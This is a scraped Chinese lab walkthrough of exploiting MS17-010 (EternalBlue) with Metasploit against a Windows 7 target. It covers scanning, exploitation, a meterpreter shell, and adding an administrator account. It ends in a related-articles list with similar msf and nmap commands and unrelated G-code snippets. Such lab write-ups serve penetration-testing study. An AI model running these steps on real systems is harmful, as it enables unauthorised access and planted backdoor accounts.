ms17010漏洞利用(主机漏洞利用)

article/2025/9/17 6:26:38

攻击机:kali ip:192.168.248.129
靶机:win7 x64 enterprise ip: 192.168.248.130

启动msf,
Msfconsole
search ms
检查msf库里是否存在ms17-010漏洞
在这里插入图片描述

Nmap检测靶机开放端口:nmap –sV 192.168.248.130
在这里插入图片描述

445端口开放,存在攻击条件

配置exploit
设置目标ip
在这里插入图片描述在这里插入图片描述

配置payload:
在这里插入图片描述

攻击:
msf exploit(ms17_010_eternalblue) > exploit
在这里插入图片描述

session对话创建成功,msf5变成meterpreter,攻击成功
查看靶机信息:
在这里插入图片描述

Shell进cmd操作:
在这里插入图片描述

添加账户
在这里插入图片描述

提升用户权限为管理员权限
在这里插入图片描述
(中文乱码问题后边解决)
使用hahaha登录成功
在这里插入图片描述

在这里插入图片描述

翻滚吧,皮卡丘~


http://chatgpt.dhexx.cn/article/T2wcMPvQ.shtml

相关文章

永恒之蓝(MS17010)漏洞kali使用MSF进行漏洞复现

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端…

永恒之蓝-MS17010 CVE-2017-0146

提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 一、永恒之…

永恒之蓝(ms17010)漏洞利用

目录 1.启动msf 2.检查msf库里是否存在ms17-010漏洞 3.扫描靶机开放端口 4.配置目标ip,本地ip并利用exploit进行攻击 5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图 6.获得shell控制台进cmd操作,添加账户提升权限 7.远程登录靶机 8.输入…

〖EXP〗NSA MS17010永恒之蓝漏洞一键工具

漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯…

MS17010漏洞利用总结

0x01 常规打法 扫描是否存在ms17-010漏洞: nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --openMSF常规漏洞利用: msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 反向打: msf …

MS17010漏洞利用姿势

MSF 搜索ms17-010 存在这些利用模块 0 exploit/windows/smb/ms17_010_eternalblue 1 exploit/windows/smb/ms17_010_psexec 2 auxiliary/admin/smb/ms17_010_command 3 auxiliary/scanner/smb/smb_ms17_010 4 exploit/windows/smb/smb_doublepulsar_rce 0 expl…

〖EXP〗NSA MS17010永恒之蓝一键工具

漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯…

MS17010原生打法

1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。 项目地址:https://gith…

MS17010(永恒之蓝)漏洞复现

MS17010(永恒之蓝)漏洞利用与复现 首先需要准备win7的环境做为靶机 获取信息 利用nmap扫描得到,靶机IP nmap -sP 192.168.229.0/24得到: IP:192.168.229.169 然后利用: nmap --scriptvuln 192.168.229.169得到靶机信息: 发…

关于ms17010渗透

今天来说一下ms17010渗透,大家都知道在2017爆发出来了永恒之蓝病毒,导致比特币严重涨价(为啥我没屯几个,这可能就是我穷的的原因吧),永恒之蓝的漏洞版本名称也被称之为ms17_010今天就来详细和大家讲一下 靶…

Metasploit工具介绍及ms17010复现

Metasploit渗透框架介绍及永恒之蓝复现 一、Metasploit渗透框架介绍1.1 名词解释1.2 MSF简介1.3 MSF框架结构1.4 MSF命令汇总1.4.1 常用命令1.4.2 基本命令1.4.3 Exploits模块1.4.4 漏洞名称规则 1.5 MSF模块介绍1.5.1 auxiliary(辅助模块)1.5.2 exploits(漏洞利用模块)1.5.3 p…

永恒之蓝-------MS17010漏洞重现

目录 引言永恒之蓝介绍什么是SMB协议SMB协议的工作原理 实验环境准备实验开始查看靶机和攻击机ip地址及子网掩码使用netdiscover工具对该网段进行局域网存活主机探测使用nmap对ip地址进行查询打开MSF使用search搜索搜索ms17_010使用模块进行分析并攻击设置攻击机ip并开始最后运…

gcode 解析入门1-1

marlin2.X 的源码分析 gcode 源码, 文件目录 队列类 解析类 gcode 类 指令类 文件分类

GRBL三:gcode代码解析(转载)

因初学GRBL,网上搜集了一些GRBL的资料,怕遗忘,所以转载过来,如有侵权请联系,立即删除。 原文地址:https://blog.csdn.net/zhangjikuan/article/details/46697019 1.G00X_Y_Z_ :快速定位指令&#xff0c…

GCode_interpreter解读

关于GCode_interpreter 下学期要做课设,要徒手画a0的图,准备做个A0的绘图仪@_@ 本来想用grbl来驱动,但了解之后发现它是用avr的c写的,而且代码量也挺大的,考虑到后面可能要加一些功能(换笔什么的),怕修改不来,就放弃了。后来又找了很多g代码解释器,最后…

05-gcode

MMIM: BAPI 货物移动的可能代码 SE16N 后台表 T158G 01 MB01 ------------ 02 MB31 ------------ 03 MB1A ------------ 04 MB1B ------------ 05 MB1C ------------ 06 MB11 ------------ 07 MB04 GT_GSMT-MVT_IND 只有…

GRBL分析:gcode解释器(二)

GCode解释器 - gc_execute_line函数解析 更新记录 2021-8-23 添加函数功能描述 2021-8-24 添加简单的流程绘制 函数功能描述 函数原型 uint8_t gc_execute_line(char *line);参数 char* line 在 protocol.c 文件的 protocol_main_loop 函数中,主循环内部会…

Marlin关于如何接收Gcode指令的详解

我研究的Marlin是1.0版本的.想用在的地方是stm32 Marlin关于接收Gcode命令最主要的函数就是: get_command() get_command()函数说实话对于我这样的学生来说程度还是挺复杂的. 为了节省大家理清代码和阅读文章的时间, 我全文用字力求精简, 别人已经写了的知识我就不会写 先上…

Gcode文件处理和执行

流程图: 1:SMC_OutQueue 不带参数>>>SMC_Interpolator 插补算法 2:CMC_CNC_REF 带参数>>>smc_NCDecoder 图型解析>>>ToolCorr 刀补>>>SmoothPath 圆弧>>>checkVelocities 速度 3:File 文件.txt/.cnc/.gcode>…

GCD简介

1. 什么是GCD GCD,全称是Grand Central Dispatch,它是C语言的API. GCD的核心 : 将block(任务)添加到queue(队列)中. 官方文档的描述: Grand Central Dispatch(GCD)是异步执行任务的技术之一。一般将应用程序中记述的线程管理用的代码在系统级中实现.开发者只需定义想执行的任…